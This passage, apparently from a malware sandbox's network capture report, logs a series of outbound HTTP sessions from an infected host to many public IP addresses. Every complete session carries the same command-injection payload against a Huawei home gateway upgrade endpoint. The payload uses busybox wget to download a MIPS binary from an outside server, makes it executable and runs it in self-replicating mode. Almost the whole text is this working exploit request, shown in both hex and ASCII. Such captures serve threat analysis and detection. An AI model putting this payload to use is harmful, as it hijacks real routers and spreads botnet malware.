                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1845192.168.2.233763641.212.118.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601610899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1846192.168.2.235434453.70.152.5137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601636887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1847192.168.2.233841041.166.110.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601639986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1848192.168.2.2340436197.137.214.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601716995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1849192.168.2.2350140157.15.32.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601730108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1850192.168.2.235528457.46.205.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601730108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1851192.168.2.2350394157.186.31.18737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601989985 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1852192.168.2.234433241.149.37.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.602013111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1853192.168.2.2336072176.25.128.24537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.602385998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1854192.168.2.2332786197.38.249.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.602437019 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
